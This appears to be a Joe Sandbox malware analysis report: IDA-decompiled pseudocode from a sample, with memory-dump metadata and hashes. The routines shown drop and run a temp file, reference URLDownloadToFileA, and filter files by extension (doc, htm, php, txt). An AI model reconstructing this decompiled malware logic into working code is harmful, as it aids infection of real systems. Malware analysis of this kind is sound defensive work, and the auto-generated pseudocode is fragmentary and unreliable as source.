                                                                          					_t87 =  &_v1596;
                                                                          					while(1) {
                                                                          						_v1744 = 0;
                                                                          						_v1748 = 0x400;
                                                                          						_v1752 = _t87;
                                                                          						_t67 = _a4;
                                                                          						_v1756 = _t67;
                                                                          						L10003004();
                                                                          						_t100 = _t99 - 0x10;
                                                                          						_t91 = _t67;
                                                                          						if(_t67 <= 0) {
                                                                          							break;
                                                                          						}
                                                                          						_v1756 = 0;
                                                                          						_v1760 =  &_v1696;
                                                                          						_v1764 = _t91;
                                                                          						_v1768 = _t87;
                                                                          						 *_t100 = _t92;
                                                                          						WriteFile(??, ??, ??, ??, ??);
                                                                          						_t99 = _t100 - 0x14;
                                                                          					}
                                                                          					 *_t100 = _t92;
                                                                          					CloseHandle(??);
                                                                          					_t101 = _t100 - 4;
                                                                          					_t94 =  &_v1676;
                                                                          					_v1764 = 0x44;
                                                                          					_v1768 = 0;
                                                                          					 *_t101 = _t94;
                                                                          					memset(??, ??, ??);
                                                                          					_v1676 = 0x44;
                                                                          					_v1632 = 0x87;
                                                                          					_v1656 = 0;
                                                                          					_v1660 = 0;
                                                                          					_v1648 = 1;
                                                                          					_v1652 = 1;
                                                                          					_v1628 = 0;
                                                                          					_v1764 =  &_v572;
                                                                          					_v1768 = 0x10005004;
                                                                          					_t88 =  &_v1596;
                                                                          					 *_t101 = _t88;
                                                                          					wsprintfA(??, ??);
                                                                          					_t73 = CreateProcessA(0, _t88, 0, 0, 0, 0, 0, 0, _t94,  &_v1692);
                                                                          					_t99 = _t101 - 0x28;
                                                                          					if(_t73 == 0) {
                                                                          						L7:
                                                                          						_t74 = _a4;
                                                                          						_v1764 = _t74;
                                                                          						L10003014();
                                                                          						if(_t92 != 0) {
                                                                          							_t74 = DeleteFileA( &_v572);
                                                                          						}
                                                                          						L9:
                                                                          						return _t74;
                                                                          					}
                                                                          					WaitForSingleObject(_v1692.hProcess, 0xffffffff);
                                                                          					CloseHandle(_v1692.hThread);
                                                                          					CloseHandle(_v1692);
                                                                          					DeleteFileA( &_v572);
                                                                          					_t74 = _a4;
                                                                          					_v1764 = _t74;
                                                                          					L10003014();
                                                                          					goto L9;
                                                                          				}
                                                                          				_t92 = 0;
                                                                          				goto L7;
                                                                          			}











































                                                                          0x1000157e
                                                                          0x1000158a
                                                                          0x1000159b
                                                                          0x100015a3
                                                                          0x100015c0
                                                                          0x100015fb
                                                                          0x10001600
                                                                          0x10001603
                                                                          0x10001614
                                                                          0x10001620
                                                                          0x10001626
                                                                          0x10001626
                                                                          0x1000162e
                                                                          0x10001636
                                                                          0x1000163a
                                                                          0x1000163d
                                                                          0x10001640
                                                                          0x10001645
                                                                          0x10001648
                                                                          0x1000164c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000164e
                                                                          0x1000165c
                                                                          0x10001660
                                                                          0x10001664
                                                                          0x10001668
                                                                          0x1000166b
                                                                          0x10001670
                                                                          0x10001670
                                                                          0x10001675
                                                                          0x10001678
                                                                          0x1000167d
                                                                          0x10001680
                                                                          0x10001686
                                                                          0x1000168e
                                                                          0x10001696
                                                                          0x10001699
                                                                          0x1000169e
                                                                          0x100016a8
                                                                          0x100016b2
                                                                          0x100016bc
                                                                          0x100016c6
                                                                          0x100016d0
                                                                          0x100016da
                                                                          0x100016e9
                                                                          0x100016ed
                                                                          0x100016f5
                                                                          0x100016fb
                                                                          0x100016fe
                                                                          0x1000174c
                                                                          0x10001751
                                                                          0x10001756
                                                                          0x100017b4
                                                                          0x100017b4
                                                                          0x100017b7
                                                                          0x100017ba
                                                                          0x100017c4
                                                                          0x100017cf
                                                                          0x100017d4
                                                                          0x100017d7
                                                                          0x100017de
                                                                          0x100017de
                                                                          0x10001769
                                                                          0x1000177a
                                                                          0x1000178b
                                                                          0x1000179c
                                                                          0x100017a4
                                                                          0x100017a7
                                                                          0x100017aa
                                                                          0x00000000
                                                                          0x100017af
                                                                          0x10001616
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$CreateDeleteTempclosesocket$NameObjectPathProcessSingleWaitWritememsetwsprintf
                                                                          • String ID: D$D
                                                                          • API String ID: 3923095081-143366177
                                                                          • Opcode ID: e02e9eaa58c48b76b552a7f084af21d14f79f840054da78fec714ba6f5058f6d
                                                                          • Instruction ID: 79cbd1979514fdd573897922439d2e9c43dfc8d5b4461daef0bd91c82e7501b0
                                                                          • Opcode Fuzzy Hash: e02e9eaa58c48b76b552a7f084af21d14f79f840054da78fec714ba6f5058f6d
                                                                          • Instruction Fuzzy Hash: 57512FB48097049EE710EF24C98939FBBF4EF84398F40895CE89857255D77A9698CF82
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDeleteDirectoryFileFreeLoadProcSystem_mbscatlstrcatlstrlen
                                                                          • String ID: D$D$URLDownloadToFileA$urlmon.dll
                                                                          • API String ID: 2488436691-568779862
                                                                          • Opcode ID: 74e3270b2b6714ab6cf254762190580809479b14a45afd7e6c1fb6f99d803b71
                                                                          • Instruction ID: 6020ed59d1fb2f3a26d031d0468f3da87cf9bf9a4133c77db0aeb5110a75bae0
                                                                          • Opcode Fuzzy Hash: 74e3270b2b6714ab6cf254762190580809479b14a45afd7e6c1fb6f99d803b71
                                                                          • Instruction Fuzzy Hash: F451E0B0804744CBD750EF29D98579EBBF0BF44314F404A6EE8899B381D7789688CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00402120(intOrPtr _a4) {
                                                                          				intOrPtr _v76;
                                                                          				char _v82;
                                                                          				short _v84;
                                                                          				intOrPtr _v88;
                                                                          				char _v92;
                                                                          				intOrPtr _v104;
                                                                          				intOrPtr _t53;
                                                                          				intOrPtr _t54;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				intOrPtr _t58;
                                                                          				intOrPtr _t59;
                                                                          				intOrPtr _t60;
                                                                          				signed int _t64;
                                                                          				signed int _t67;
                                                                          				signed int _t68;
                                                                          				void* _t69;
                                                                          				short* _t70;
                                                                          				signed int _t71;
                                                                          				intOrPtr _t72;
                                                                          				void* _t73;
                                                                          				void* _t74;
                                                                          				intOrPtr* _t75;
                                                                          
                                                                          				_t72 = _a4;
                                                                          				_t69 =  &_v92;
                                                                          				asm("cld");
                                                                          				memset(_t69, 0, 3 << 2);
                                                                          				_t75 = _t74 + 0xc;
                                                                          				_t70 = _t69 + 3;
                                                                          				 *_t70 = 0;
                                                                          				 *((char*)(_t70 + 2)) = 0;
                                                                          				_v92 = 0x6b6c7665;
                                                                          				_v88 = 0x686f6472;
                                                                          				_v84 = 0x706c;
                                                                          				_v82 = 0;
                                                                          				_t9 =  &_v92; // 0x6b6c7665
                                                                          				_v104 = _t9;
                                                                          				 *_t75 = 0x40e44a;
                                                                          				E00404C6A();
                                                                          				E00402106();
                                                                          				_t64 =  *0x414008;
                                                                          				_t71 = 0;
                                                                          				do {
                                                                          					_t67 = _t64 * 0xcccccccd >> 0x20 >> 3;
                                                                          					 *((intOrPtr*)(_t73 + _t71 * 4 - 0x48)) = _t64 - _t67 + _t67 * 4 + _t67 + _t67 * 4;
                                                                          					_t64 = _t67;
                                                                          					_t71 = _t71 + 1;
                                                                          				} while (_t71 <= 9);
                                                                          				_t68 = 0;
                                                                          				do {
                                                                          					 *((char*)(_t68 + _t72)) =  *( *((intOrPtr*)(_t73 + _t68 * 4 - 0x48)) +  &_v92) & 0x000000ff;
                                                                          					_t68 = _t68 + 1;
                                                                          				} while (_t68 <= 9);
                                                                          				 *((char*)(_t72 + 0xa)) = 0;
                                                                          				if(_v76 != 0) {
                                                                          					if(_v76 != 1) {
                                                                          						if(_v76 != 2) {
                                                                          							if(_v76 != 3) {
                                                                          								if(_v76 != 4) {
                                                                          									if(_v76 != 5) {
                                                                          										if(_v76 != 6) {
                                                                          											_t53 =  *0x40d07c; // 0x40e446
                                                                          											_v104 = _t53;
                                                                          											 *_t75 = _t72;
                                                                          											L0040C208();
                                                                          											return _t53;
                                                                          										}
                                                                          										_t54 =  *0x40d078; // 0x40e440
                                                                          										_v104 = _t54;
                                                                          										 *_t75 = _t72;
                                                                          										L0040C208();
                                                                          										return _t54;
                                                                          									}
                                                                          									_t55 =  *0x40d074; // 0x40e43c
                                                                          									_v104 = _t55;
                                                                          									 *_t75 = _t72;
                                                                          									L0040C208();
                                                                          									return _t55;
                                                                          								}
                                                                          								_t56 =  *0x40d070; // 0x40e437
                                                                          								_v104 = _t56;
                                                                          								 *_t75 = _t72;
                                                                          								L0040C208();
                                                                          								return _t56;
                                                                          							}
                                                                          							_t57 =  *0x40d06c; // 0x40e432
                                                                          							_v104 = _t57;
                                                                          							 *_t75 = _t72;
                                                                          							L0040C208();
                                                                          							return _t57;
                                                                          						}
                                                                          						_t58 =  *0x40d068; // 0x40e42e
                                                                          						_v104 = _t58;
                                                                          						 *_t75 = _t72;
                                                                          						L0040C208();
                                                                          						return _t58;
                                                                          					}
                                                                          					_t59 =  *0x40d064; // 0x40e429
                                                                          					_v104 = _t59;
                                                                          					 *_t75 = _t72;
                                                                          					L0040C208();
                                                                          					return _t59;
                                                                          				}
                                                                          				_t60 =  *0x40d060; // 0x40e424
                                                                          				_v104 = _t60;
                                                                          				 *_t75 = _t72;
                                                                          				L0040C208();
                                                                          				return _t60;
                                                                          			}



























                                                                          0x00402129
                                                                          0x0040212c
                                                                          0x0040212f
                                                                          0x0040213a
                                                                          0x0040213a
                                                                          0x0040213a
                                                                          0x0040213c
                                                                          0x00402141
                                                                          0x00402145
                                                                          0x0040214c
                                                                          0x00402153
                                                                          0x00402159
                                                                          0x0040215d
                                                                          0x00402160
                                                                          0x00402164
                                                                          0x0040216b
                                                                          0x00402170
                                                                          0x00402175
                                                                          0x0040217b
                                                                          0x00402185
                                                                          0x00402189
                                                                          0x00402193
                                                                          0x00402197
                                                                          0x00402199
                                                                          0x0040219a
                                                                          0x0040219f
                                                                          0x004021a4
                                                                          0x004021ad
                                                                          0x004021b0
                                                                          0x004021b1
                                                                          0x004021b6
                                                                          0x004021be
                                                                          0x004021da
                                                                          0x004021f6
                                                                          0x0040220f
                                                                          0x00402228
                                                                          0x00402241
                                                                          0x0040225a
                                                                          0x0040226f
                                                                          0x00402274
                                                                          0x00402278
                                                                          0x0040227b
                                                                          0x00000000
                                                                          0x0040227b
                                                                          0x0040225c
                                                                          0x00402261
                                                                          0x00402265
                                                                          0x00402268
                                                                          0x00000000
                                                                          0x00402268
                                                                          0x00402243
                                                                          0x00402248
                                                                          0x0040224c
                                                                          0x0040224f
                                                                          0x00000000
                                                                          0x0040224f
                                                                          0x0040222a
                                                                          0x0040222f
                                                                          0x00402233
                                                                          0x00402236
                                                                          0x00000000
                                                                          0x00402236
                                                                          0x00402211
                                                                          0x00402216
                                                                          0x0040221a
                                                                          0x0040221d
                                                                          0x00000000
                                                                          0x0040221d
                                                                          0x004021f8
                                                                          0x004021fd
                                                                          0x00402201
                                                                          0x00402204
                                                                          0x00000000
                                                                          0x00402204
                                                                          0x004021dc
                                                                          0x004021e1
                                                                          0x004021e5
                                                                          0x004021e8
                                                                          0x00000000
                                                                          0x004021e8
                                                                          0x004021c0
                                                                          0x004021c5
                                                                          0x004021c9
                                                                          0x004021cc
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: _mbscat
                                                                          • String ID: $@$)@$.@$2@$7@$<@$@@$F@$evlkrdohlp
                                                                          • API String ID: 134015809-3435826350
                                                                          • Opcode ID: ba1be5f7a4b05f6ad6f1eb42656a354e92ad3395ec866426798a2edddf5be352
                                                                          • Instruction ID: 21a54818e9aca3eeccc7b18a3caaa5206cc12068587b62876ebf60fed946ae37
                                                                          • Opcode Fuzzy Hash: ba1be5f7a4b05f6ad6f1eb42656a354e92ad3395ec866426798a2edddf5be352
                                                                          • Instruction Fuzzy Hash: 7D411A70E04244DBCB509FA9D68565EBBF0AB45708F10457FE498AB3C1D3789986CB4A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00403622(signed int __eax, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				void* _v16;
                                                                          				char _v300;
                                                                          				intOrPtr _v308;
                                                                          				intOrPtr _v312;
                                                                          				intOrPtr _v324;
                                                                          				intOrPtr _v332;
                                                                          				intOrPtr _v340;
                                                                          				intOrPtr _v348;
                                                                          				intOrPtr _v356;
                                                                          				intOrPtr _v364;
                                                                          				intOrPtr _v372;
                                                                          				intOrPtr _v380;
                                                                          				void* __ebx;
                                                                          				signed int _t32;
                                                                          				char _t37;
                                                                          				char* _t38;
                                                                          				intOrPtr _t41;
                                                                          				signed int _t42;
                                                                          				intOrPtr _t43;
                                                                          				char _t44;
                                                                          				char* _t45;
                                                                          				void* _t46;
                                                                          				intOrPtr* _t47;
                                                                          				intOrPtr* _t48;
                                                                          				intOrPtr* _t49;
                                                                          
                                                                          				_t42 = __edx;
                                                                          				_t32 = __eax;
                                                                          				_t47 = _t46 - 0x12c;
                                                                          				_t43 = _a4;
                                                                          				_t41 = _a8;
                                                                          				_t37 = 0;
                                                                          				_t44 = 0xffffffff;
                                                                          				if( *((char*)(_t41 + 0x2c)) == 0) {
                                                                          					L4:
                                                                          					if(_t44 >= 0) {
                                                                          						_v308 = 0x103;
                                                                          						_v312 = _t41 + _t44 + 0x2d;
                                                                          						_t38 =  &_v300;
                                                                          						 *_t47 = _t38;
                                                                          						L0040C350();
                                                                          						_t48 = _t47 - 0xc;
                                                                          						 *_t48 = _t38;
                                                                          						_t32 = CharLowerA(??);
                                                                          						_t47 = _t48 - 4;
                                                                          					} else {
                                                                          						_v300 = 0;
                                                                          					}
                                                                          					_v324 = 0x40efb2;
                                                                          					_t45 =  &_v300;
                                                                          					 *_t47 = _t45;
                                                                          					L0040C318();
                                                                          					_t49 = _t47 - 8;
                                                                          					if(_t32 == 0) {
                                                                          						L15:
                                                                          						 *_t49 = _t43;
                                                                          						_t32 =  ~((E00402F2E(1, _t42) & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
                                                                          						if((0x00000001 & _t32) == 1) {
                                                                          							 *_t49 = _t43;
                                                                          							_t32 = E0040307E(_t42);
                                                                          						}
                                                                          						goto L17;
                                                                          					} else {
                                                                          						_v332 = 0x40efb7;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v340 = 0x40efbb;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v348 = 0x40efbf;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v356 = 0x40efc3;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v364 = 0x40efc7;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v372 = 0x40ee83;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v380 = 0x40efca;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 != 0) {
                                                                          							L17:
                                                                          							return _t32;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          				} else {
                                                                          					goto L1;
                                                                          				}
                                                                          				do {
                                                                          					L1:
                                                                          					if( *((char*)(_t41 + _t37 + 0x2c)) == 0x2e) {
                                                                          						_t44 = _t37;
                                                                          					}
                                                                          					_t37 = _t37 + 1;
                                                                          					_t42 = _t42 & 0xffffff00 |  *((char*)(_t41 + _t37 + 0x2c)) != 0x00000000;
                                                                          					_t32 = _t32 & 0xffffff00 | _t37 - 0x000000fe <= 0x00000000;
                                                                          				} while ((_t42 & _t32) != 0);
                                                                          				goto L4;
                                                                          			}




























                                                                          0x00403622
                                                                          0x00403622
                                                                          0x00403628
                                                                          0x0040362e
                                                                          0x00403631
                                                                          0x00403634
                                                                          0x00403639
                                                                          0x00403642
                                                                          0x00403663
                                                                          0x00403665
                                                                          0x00403670
                                                                          0x0040367c
                                                                          0x00403680
                                                                          0x00403686
                                                                          0x00403689
                                                                          0x0040368e
                                                                          0x00403691
                                                                          0x00403694
                                                                          0x00403699
                                                                          0x00403667
                                                                          0x00403667
                                                                          0x00403667
                                                                          0x004036a1
                                                                          0x004036a9
                                                                          0x004036af
                                                                          0x004036b2
                                                                          0x004036b7
                                                                          0x004036bc
                                                                          0x00403767
                                                                          0x00403767
                                                                          0x00403777
                                                                          0x0040377e
                                                                          0x00403780
                                                                          0x00403783
                                                                          0x00403783
                                                                          0x00000000
                                                                          0x004036c2
                                                                          0x004036c2
                                                                          0x004036ca
                                                                          0x004036cd
                                                                          0x004036d2
                                                                          0x004036d7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004036dd
                                                                          0x004036e5
                                                                          0x004036e8
                                                                          0x004036ed
                                                                          0x004036f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004036f4
                                                                          0x004036fc
                                                                          0x004036ff
                                                                          0x00403704
                                                                          0x00403709
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040370b
                                                                          0x00403713
                                                                          0x00403716
                                                                          0x0040371b
                                                                          0x00403720
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403722
                                                                          0x0040372a
                                                                          0x0040372d
                                                                          0x00403732
                                                                          0x00403737
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403739
                                                                          0x00403741
                                                                          0x00403744
                                                                          0x00403749
                                                                          0x0040374e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403750
                                                                          0x00403758
                                                                          0x0040375b
                                                                          0x00403760
                                                                          0x00403765
                                                                          0x00403788
                                                                          0x0040378f
                                                                          0x0040378f
                                                                          0x00000000
                                                                          0x00403765
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403644
                                                                          0x00403644
                                                                          0x00403649
                                                                          0x0040364b
                                                                          0x0040364b
                                                                          0x0040364d
                                                                          0x00403653
                                                                          0x0040365c
                                                                          0x0040365f
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmp$CharLowerlstrcpyn
                                                                          • String ID: doc$htm$html$php$tbb$txt$xml
                                                                          • API String ID: 838419190-2496469446
                                                                          • Opcode ID: 224cabb6541a4449cfda70ae68bee2be7fcebbb5efeb781ad9319cfc72626951
                                                                          • Instruction ID: 6961f7bd5c8fa27dba0ec7a422f8e7192e07f4a6a10a31976eaf7852eedd0230
                                                                          • Opcode Fuzzy Hash: 224cabb6541a4449cfda70ae68bee2be7fcebbb5efeb781ad9319cfc72626951
                                                                          • Instruction Fuzzy Hash: FE31B1B44047409AC7107F368A8526E7EE89B4078DF01897FEC80676C2D73C8A59CB9F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 42%
                                                                          			E10001170(void* __eax) {
                                                                          				void* _v20;
                                                                          				short _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v88;
                                                                          				intOrPtr _v92;
                                                                          				intOrPtr _v96;
                                                                          				intOrPtr _v100;
                                                                          				intOrPtr _v104;
                                                                          				intOrPtr _v108;
                                                                          				char _v112;
                                                                          				short _v128;
                                                                          				intOrPtr _v132;
                                                                          				intOrPtr _v136;
                                                                          				intOrPtr _v140;
                                                                          				intOrPtr _v144;
                                                                          				intOrPtr _v148;
                                                                          				intOrPtr _v152;
                                                                          				intOrPtr _v156;
                                                                          				intOrPtr _v160;
                                                                          				char _v192;
                                                                          				int _v196;
                                                                          				intOrPtr _v204;
                                                                          				intOrPtr _v208;
                                                                          				intOrPtr _v212;
                                                                          				intOrPtr _v216;
                                                                          				intOrPtr _v232;
                                                                          				intOrPtr _v236;
                                                                          				intOrPtr _v240;
                                                                          				intOrPtr _v244;
                                                                          				void* __ebx;
                                                                          				char _t58;
                                                                          				intOrPtr _t59;
                                                                          				intOrPtr _t60;
                                                                          				intOrPtr _t61;
                                                                          				intOrPtr _t62;
                                                                          				intOrPtr _t63;
                                                                          				intOrPtr _t64;
                                                                          				intOrPtr _t65;
                                                                          				signed int _t68;
                                                                          				intOrPtr _t71;
                                                                          				void* _t72;
                                                                          				signed char _t90;
                                                                          				char _t93;
                                                                          				intOrPtr _t94;
                                                                          				intOrPtr _t95;
                                                                          				intOrPtr _t96;
                                                                          				intOrPtr _t97;
                                                                          				intOrPtr _t98;
                                                                          				intOrPtr _t99;
                                                                          				intOrPtr _t100;
                                                                          				void* _t105;
                                                                          				void* _t107;
                                                                          				signed int _t108;
                                                                          				signed int _t114;
                                                                          				void* _t118;
                                                                          				signed int _t119;
                                                                          				signed int _t124;
                                                                          				signed int _t127;
                                                                          				struct _IO_FILE* _t131;
                                                                          				struct _IO_FILE* _t133;
                                                                          				signed int* _t134;
                                                                          				intOrPtr* _t135;
                                                                          				intOrPtr* _t137;
                                                                          				intOrPtr* _t138;
                                                                          				signed int* _t139;
                                                                          
                                                                          				_pop(_t130);
                                                                          				_t131 = _t133;
                                                                          				_push(_t107);
                                                                          				_t134 = _t133 - 0xcc;
                                                                          				if( *0x10006114 == 0) {
                                                                          					_v112 = 0x41414141;
                                                                          					_t58 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
                                                                          					_t127 =  &_v112;
                                                                          					_v108 = 0x41414141;
                                                                          					_v104 = 0x41414141;
                                                                          					_v80 = _t58;
                                                                          					_t59 = M10005250; // 0x57434347
                                                                          					_v100 = 0x41414141;
                                                                          					_v96 = 0x41414141;
                                                                          					_v76 = _t59;
                                                                          					_t60 = M10005254; // 0x452d3233
                                                                          					_v92 = 0x41414141;
                                                                          					_v88 = 0x41414141;
                                                                          					_v72 = _t60;
                                                                          					_t61 = M10005258; // 0x2d322d48
                                                                          					_v84 = 0x41414141;
                                                                          					_v68 = _t61;
                                                                          					_t62 = M1000525C; // 0x4a4c4a53
                                                                          					_v64 = _t62;
                                                                          					_t63 = M10005260; // 0x4854472d
                                                                          					_v60 = _t63;
                                                                          					_t64 = M10005264; // 0x494d2d52
                                                                          					_v56 = _t64;
                                                                          					_t65 =  *0x10005268; // 0x3357474e
                                                                          					_v52 = _t65;
                                                                          					_v48 =  *0x1000526c & 0x0000ffff;
                                                                          					 *_t134 = _t127;
                                                                          					_t68 = FindAtomA(??) & 0x0000ffff;
                                                                          					_t135 = _t134 - 4;
                                                                          					_v196 = _t68;
                                                                          					if(_t68 != 0) {
                                                                          						L11:
                                                                          						_t108 = E10003150(_t68, _t107);
                                                                          					} else {
                                                                          						 *_t135 = 0x3c;
                                                                          						_t72 = malloc(??);
                                                                          						_t108 = _t72;
                                                                          						if(_t72 == 0) {
                                                                          							abort();
                                                                          							0;
                                                                          							0;
                                                                          							_t137 = _t135 - 0x18;
                                                                          							_v232 = _v204;
                                                                          							_v236 = _v208;
                                                                          							_v240 = _v212;
                                                                          							_v244 = _v216;
